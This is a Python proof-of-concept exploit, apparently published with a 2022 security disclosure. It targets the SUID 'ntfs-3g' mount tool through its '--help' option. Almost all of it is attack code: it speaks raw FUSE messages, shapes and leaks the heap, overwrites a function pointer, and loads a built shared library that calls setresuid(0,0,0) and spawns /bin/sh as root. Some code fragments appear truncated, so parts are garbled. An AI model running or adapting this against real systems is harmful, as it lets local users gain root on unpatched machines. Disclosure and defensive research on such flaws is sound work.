#!/usr/bin/python3 -BbbEIsSttW all """This software is provided by the copyright owner "as is" and WITHOUT ANY EXPRESSED OR IMPLIED WARRANTIES, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose are disclaimed. In no event shall the copyright owner be liable for any direct, indirect, incidential, special, exemplary or consequential damages, including, but not limited to, procurement of substitute goods or services, loss of use, data or profits or business interruption, however caused and on any theory of liability, whether in contract, strict liability, or tort, including negligence or otherwise, arising in any way out of the use of this software, even if advised of the possibility of such damage. Copyright (c) 2022 Unparalleled IT Services e.U. https://unparalleled.eu/blog/2022/20220607-help-to-heap-suid-privilege-escalation/ The software is only provided for reference to ease understanding and fixing of an underlying security issue in "ntfs-3g". Therefore it may NOT be distributed freely while the security issue is not fixed and patched software is available widely. After that phase permission to use, copy, modify, and distribute this software according to GNU Lesser General Public License (LGPL-3.0) purpose is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. This program demonstrates how to expoit the userspace file system mount tool "ntfs-3g" using the "--help" option.""" import os import socket import struct import subprocess import sys import time def buildFuseHeader(command, nodeId): """Build the 40 byte fuse header.""" return ( b'\x00\x00\x00\x00' + struct.pack(' len(memData)): return None return memData[offset:offset + length] class ExploitContext: def __init__(self): # This is the socket used by ntfs-3g to perform fuse protocol communication. self.fuseSocket = None # Keep the reference to one file for truncating and writing, # see readMemory(). self.fileNodeId = None self.heapReadDirHandleAddress = None self.heapReadDirContentAddress = None self.heapReadDirContentOffset = None self.heapStartAddess = None self.heapData = None self.fuseStructAddress = None self.ntfs3gProcess = None # This table stores the file names with suitable inode numbers. self.inodeTable = None def ntfs3gInit(self): if self.ntfs3gProcess is not None: raise Exception() self.fuseSocket, childSocket = socket.socketpair() self.ntfs3gProcess = subprocess.Popen( ['/bin/ntfs-3g', '-o', '--help,no_detach', 'image', 'mnt'], stdin=childSocket.fileno()) childSocket.close() def ntfs3gClose(self): self.fuseSocket.close() self.fuseSocket = None self.ntfs3gProcess.wait() self.ntfs3gProcess = None def lookupNode(self, name): """Lookup, return nodeid""" # FUSE_LOOKUP 1 self.fuseSocket.send(buildFuseHeader(1, 1) + name + b'\x00') result = self.fuseSocket.recv(1<<16) if len(result) == 16: return None return unpackLong(result, 16) def truncateNode(self, nodeId, length): # FUSE_SETATTR 4 self.fuseSocket.send( buildFuseHeader(4, nodeId) + b'\x08\x00\x00\x00\x00\x00\x00\x00' + b'\x00' * 8 + packLong(length)) self.fuseSocket.recv(1<<16) # FUSE_MKDIR 9 def fuseMkdir(self, nodeId, name): self.fuseSocket.send( buildFuseHeader(9, nodeId) + b'\x00\x00\x00\x00\x00\x00\x00\x00' + name + b'\x00') return self.fuseSocket.recv(1<<16)[16:] # FUSE_RMDIR 11 def rmdir(self, nodeId, name): self.fuseSocket.send( buildFuseHeader(0xb, nodeId) + name + b'\x00') return self.fuseSocket.recv(1<<16) def writeNode(self, nodeId, offset, length, data): # FUSE_WRITE 16 if len(data) < length: raise Exception() self.fuseSocket.send( buildFuseHeader(0x10, nodeId) + \ b'\xff\x00\x00\x00\x00\x00\x00\x00' + \ struct.pack(' extern void _init() { setresuid(0, 0, 0); char* args[2]; args[0]="/bin/sh"; args[1]=NULL; execve(args[0], args, NULL); }""", 'ascii')) subprocess.check_call( 'ld -shared -Bdynamic s.o -o /tmp/s.so'.split(' ')) # This is the first run, so build the inode table without really # executing the payload. self.runExploit() def runExploit(self): """Run the exploit code. This requires an appropriate NTFS image with crafted inode numbers to be available. If the image is not ready yet, all required inodes are created and the function terminates without attempting exploitation as after those operations the heap is in a really bad shape.""" self.ntfs3gInit() self.fuseInit() # Have a file node reference for heap spraying. self.fileNodeId = self.lookupNode(b'File') # Massage the heap to appropriate shape. self.fuseSetXAttr(self.fileNodeId) self.fuseCreate(b'XXXYYYYY', 1) self.heapReadDirHandleAddress = dirHandleAddress = self.openDir(1) print('OPENDIR: Address dirhandle 0x%x' % dirHandleAddress) self.fuseReadDir(1, dirHandleAddress, 0, 0x4000) if self.inodeTable is None: self.buildInodeTable(b'Dir') self.ntfs3gClose() return memStart, contentAddress, memData = self.getDirHandleMemory( dirHandleAddress) print( 'Assuming heap start at 0x%x with 0x%x bytes data extracted' % ( memStart, len(memData))) if contentAddress is None: raise Exception() dirStructOffset = dirHandleAddress - memStart dirStructData = memData[dirStructOffset:dirStructOffset+0x60] fuseStructAddress = unpackLong(dirStructData, 0x28) self.heapReadDirContentAddress = contentAddress self.heapReadDirContentOffset = contentAddress - memStart self.heapStartAddess = memStart self.heapData = memData self.fuseStructAddress = fuseStructAddress fuseFsAddress = unpackLong( getMem(memData, memStart, fuseStructAddress, 0x110), 0x108) print('Got fuse_fs address 0x%x.' % fuseFsAddress) mknodFunctionAddress = unpackLong( getMem(memData, memStart, fuseFsAddress, 0x80), 0x10) print('Got mknod op: 0x%x' % mknodFunctionAddress) mknodFunctionPtrAddress = fuseFsAddress + 0x10 checkData = self.readMemory(mknodFunctionPtrAddress, 0x8) if checkData != packLong(mknodFunctionAddress): raise Exception() selectReparsePluginAddress = packLong(mknodFunctionAddress + 0x14b7) self.writeMemory( mknodFunctionPtrAddress, selectReparsePluginAddress) checkData = self.readMemory(mknodFunctionPtrAddress, 0x8) if selectReparsePluginAddress != checkData: raise Exception('Update to function address failed') # Finally call mknod and load the shared library. # FUSE_MKNOD 8 self.fuseSocket.send( buildFuseHeader(0x8, 1) + \ b'\xff\x05\x00\x00\xa4\x81\x00\x00' + b'tmp/s.so\x00') # The privileged process is just a subprocess of this process # so forward our stdin data to it. print('Type shell commands:') while True: try: line = sys.stdin.readline() self.fuseSocket.send(bytes(line, 'utf-8')) except BrokenPipeError: self.ntfs3gClose() break def main(): """This is the program main function.""" context = ExploitContext() context.initExploit() context.runExploit() if __name__ == '__main__': main()